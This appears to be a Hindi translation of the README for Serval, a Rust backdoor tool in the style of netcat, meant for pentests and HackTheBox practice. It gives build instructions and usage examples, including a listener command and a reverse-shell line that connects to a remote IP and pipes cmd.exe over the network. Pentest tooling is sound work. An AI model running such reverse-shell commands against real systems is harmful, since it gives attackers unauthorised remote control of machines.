
पेंटेस्टिंग और पेंटेस्ट अभ्यासों के लिए नेटकैट-शैली का बैकडोर
Serval एक हल्का, उपयोग में आसान बाइनरी है जो पेंटेस्ट या पेंटेस्टिंग अभ्यासों के लिए रिवर्स और बाइंड शेल उत्पन्न करने के लिए है। Serval क्रॉस-प्लेटफ़ॉर्म है और इसे Windows 32 और 64-बिट और Linux 32 और 64-बिट दोनों के लिए संकलित किया जा सकता है। नोट: Rust के लचीलेपन के कारण अन्य प्लेटफार्मों (जैसे ARM) के लिए संकलन करना संभव हो सकता है, लेकिन मैंने अन्य प्लेटफार्मों के लिए परीक्षण नहीं किया है।
मैंने Serval को HacktheBox चुनौतियों के दौरान netcat पर अपनी निर्भरता हटाने के लिए विकसित किया, क्योंकि Windows के लिए netcat बाइनरी ढूंढना परेशानी भरा हो सकता है (विशेषकर -e विकल्प के साथ) और एक भरोसेमंद स्रोत से बाइनरी ढूंढना और भी कठिन है।
GitHub से स्रोत डाउनलोड करें
git clone https://github.com/tgadola/serval.git && cd serval-master
*वैकल्पिक: अपने बिल्डपथ को फिर से लिखने के लिए .cargo/config पर बिल्ड फ़ाइल संपादित करें।
अपने वर्तमान प्लेटफॉर्म के लिए बाइनरी बनाएं।
cargo build --release
*नोट: v1.1.0 के लिए Rust nightly आवश्यक है
आप अन्य प्लेटफार्मों के लिए इसका उपयोग करके बना सकते हैं
cargo build --release --target <target-triple>
यदि आप विशेष रूप से भरोसेमंद व्यक्ति हैं तो आप पहले से निर्मित बाइनरी यहाँ से डाउनलोड कर सकते हैं।
डिफ़ॉल्ट रूप से Serval या तो एक पोर्ट पर सुनता है या कनेक्ट होता है और मानक इनपुट और आउटपुट को उस कनेक्शन पर पाइप करता है। -e फ्लैग एक प्रक्रिया उत्पन्न करेगा और उसके मानक इनपुट और आउटपुट को नेटवर्क पर पाइप करेगा।
Serval सभी इंटरफेस पर सुनता है।
लाइन एडिटिंग और कमांड इतिहास सुविधाओं को सक्रिय करने के लिए -H फ्लैग का उपयोग करें!
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
@kkawakam-transferwise और उनके Rustyline क्रेट को बहुत-बहुत धन्यवाद, जो वास्तव में सभी भारी काम करता है। Rustyline देखें!
Clap के निर्माताओं और योगदानकर्ताओं को धन्यवाद! Clap देखें।
Anyhow के निर्माताओं और योगदानकर्ताओं को धन्यवाद! Anyhow देखें। महान क्रेट नाम के लिए +1।
@jaynus को उनकी सभी Rust सलाह के लिए धन्यवाद
Apache 2.0. अधिक जानकारी के लिए लाइसेंस फ़ाइल देखें।